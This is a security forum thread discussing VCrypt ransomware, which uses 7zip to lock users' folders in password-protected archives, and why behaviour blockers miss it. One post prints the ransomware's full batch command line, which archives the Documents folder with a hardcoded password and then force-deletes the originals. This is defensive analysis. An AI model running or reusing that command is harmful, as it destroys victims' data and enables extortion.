New VCrypt Ransomware locks files in password-protected 7ZIPs

CyberTech

Level 44
Thread author
Verified
Top Poster
Well-known
Nov 10, 2017
3,247
A new ransomware called VCrypt is targeting French victims by utilizing the legitimate 7zip command-line program to create password-protected archives of data folders.

BleepingComputer was told today about a new ransomware that was deleting all of a victim's files found in Windows data folders and then creating new "encrypted" files named after the folder name.

These encrypted files would utilize a naming format of username_foldername.vxcrypt.

For example, the files in the Documents folder would be deleted, and a file named User_documents.vcrypt would be created, as shown in the image below.
 

MacDefender

Level 16
Verified
Top Poster
Oct 13, 2019
779
Well now it begins..... I wonder if some AV vendors are finding their statements a bit ironic about how TrojanZipperPOC and Ransominator are not realistic.

I sincerely hope that this evolved organically and our attempts to demonstrate a common behavior blocker weakness did not inspire real malware writers.

Unfortunately very very few AVs correctly identify this kind of an attack because most behavior blockers just look at the offending process (7zip in this case) and consider it trusted/whitelisted, as opposed to the whole chain of events that led to 7zip being started, or what exactly 7zip was told to do.
 

MacDefender

Level 16
Verified
Top Poster
Oct 13, 2019
779
FWIW, luckily, this ransomware is very poorly and dumbly coded:

Code:
2480 - C:\Windows\system32\cmd.exe /c if exist %USERPROFILE%\Documents\ for /F %i in (dir /b "%USERPROFILE%\\Documents\\*.*") do %TEMP%\mod_01.exe a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS %USERPROFILE%\%username%_documents.vcrypt %USERPROFILE%\Documents\* & del /f /s /q %USERPROFILE%\Documents\ & FOR /D %p IN (%USERPROFILE%\Documents\*) do rmdir %p /s /q

It uses a batch file and the del command to delete the documents. If they wanted to be smart, they'd use the "-sdel" argument to 7za. Attempting to directly delete the user's documents without abusing a whitelisted process triggers most behavior blockers that are able to AMSI inspect batch files.
 
Last edited:

SeriousHoax

Level 47
Well-known
Mar 16, 2019
3,630
Tbh, looks like detecting this ransomware shouldn't even require a trigger from a behavior blocker because AVs with good signatures and heuristics should be able to detect it easily without any additional help. Eg: ESET's detection of this malware as "A Variant Of Win32/Filecoder.NTG".
 

struppigel

Moderator
Verified
Staff Member
Well-known
Apr 9, 2020
656
Well now it begins..... I wonder if some AV vendors are finding their statements a bit ironic about how TrojanZipperPOC and Ransominator are not realistic.

Who said it is unrealistic? Zip abusing ransomware has been around for years, before those PoCs.

also written in C 🤔
EDIT: looks like a cybercriminal recreated my PoC and removed the need for a local 7zip copy

The main code is a batch script.
 

MacDefender

Level 16
Verified
Top Poster
Oct 13, 2019
779
Who said it is unrealistic? Zip abusing ransomware has been around for years, before those PoCs.

I believe it was ESET or maybe another vendor. Basically they brushed off the proof of concept as not realistic because users archive their files using 7Zip too, or something along those lines. Either way it was a fairly dismissive analysis of a real problem I was trying to demonstrate, which is a lot of behavior blockers turn a blind eye if you have a trusted process be the last agent to modify and delete your documents.
 

miguelang611

Level 2
Apr 13, 2020
99
Well now it begins..... I wonder if some AV vendors are finding their statements a bit ironic about how TrojanZipperPOC and Ransominator are not realistic.

I sincerely hope that this evolved organically and our attempts to demonstrate a common behavior blocker weakness did not inspire real malware writers.

Unfortunately very very few AVs correctly identify this kind of an attack because most behavior blockers just look at the offending process (7zip in this case) and consider it trusted/whitelisted, as opposed to the whole chain of events that led to 7zip being started, or what exactly 7zip was told to do.
As an idea, maybe for people with AVs that can have different levels of restriction (Kaspersky has it, I guess other AVs also), making 7z to allow just 1 folder access, like downloads folder. Then would just encrypt that folder in case of attack o_O

Might not be perfect, but I guess it would make the job :unsure:
 

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

User Menu

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top